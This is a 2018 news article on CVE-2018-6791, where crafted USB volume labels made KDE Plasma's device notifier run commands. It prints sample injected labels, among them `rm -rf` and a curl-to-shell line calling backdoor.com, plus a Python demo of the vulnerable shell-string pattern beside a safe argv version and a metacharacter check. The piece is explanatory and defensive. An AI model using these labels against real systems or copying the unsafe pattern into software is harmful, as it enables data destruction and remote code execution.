KDE Plasma Had A Silly But Serious Security Bug

Written by Michael Larabel in KDE on 9 February 2018 at 06:10 AM EST. 33 Comments
If you are a KDE user and haven't yet upgraded to Plasma 5.12 (or to one of the recent point releases carrying the fix), you may want to do so soon -- especially if your system is potentially accessible by others who could insert rogue flash/memory devices.

Plasma 5 versions prior to 5.12.0 are vulnerable to CVE-2018-6791, an arbitrary command execution vulnerability in the removable device notifier.

With a flash drive or other USB memory device using a FAT file-system, placing backticks or $() within the volume label is enough to force arbitrary commands to be executed when the drive is plugged in.

Rogue actors or pranksters could e.g. create a VFAT volume with a label of `rm -rf` or $(curl http://backdoor.com | sh) or any of a number of potential commands, and KDE Plasma would end up executing those commands when the device was connected to the system.
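To illustrate the two patterns at play, here is an added example (not code from KDE or the advisory): in Python, splicing an untrusted volume label into a shell command string lets $() and backticks expand, while handing it over as a separate argument with no shell involved does not. The sample labels are constructed and the injected commands are inert echoes.

```python
import subprocess

# Constructed sample labels (not taken from the advisory). The last two contain
# the $() and backtick syntax the article describes; the payload is an inert echo.
SAMPLE_LABELS = ["USB_STICK", "Holiday Photos", "$(echo injected)", "`echo injected`"]

# Characters that let a label alter a shell command it is spliced into.
SHELL_META = set("`$(){}|;&<>\\\"'")


def label_has_shell_metachars(label: str) -> bool:
    """Defensive check: flag a volume label that is unsafe to place in a shell string."""
    return any(ch in SHELL_META for ch in label)


def vulnerable_notify(label: str) -> str:
    """Unsafe pattern: the label is interpolated into a shell command string,
    so /bin/sh performs $() and backtick substitution on whatever it contains."""
    cmd = f"echo 'Device connected:' {label}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()


def hardened_notify(label: str) -> str:
    """Safe pattern: an argv list with no shell involved. The label arrives as a
    single argument and is never parsed, so nothing inside it is substituted."""
    return subprocess.run(["echo", "Device connected:", label],
                          capture_output=True, text=True).stdout.strip()


if __name__ == "__main__":
    for label in SAMPLE_LABELS:
        flag = "SUSPICIOUS" if label_has_shell_metachars(label) else "ok"
        print(f"label={label!r:24} check={flag}")
        print(f"  shell string  -> {vulnerable_notify(label)}")
        print(f"  argv list     -> {hardened_notify(label)}")
```

Running it shows the shell-string variant printing "injected" for the last two labels, whereas the argv variant echoes the label text verbatim.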


It's straightforward to exploit but obviously requires physical access to the system. The issue has been fixed in KDE Plasma 5.12.0 and is being back-ported to older Plasma releases. The CVE was made public yesterday with details via this security advisory.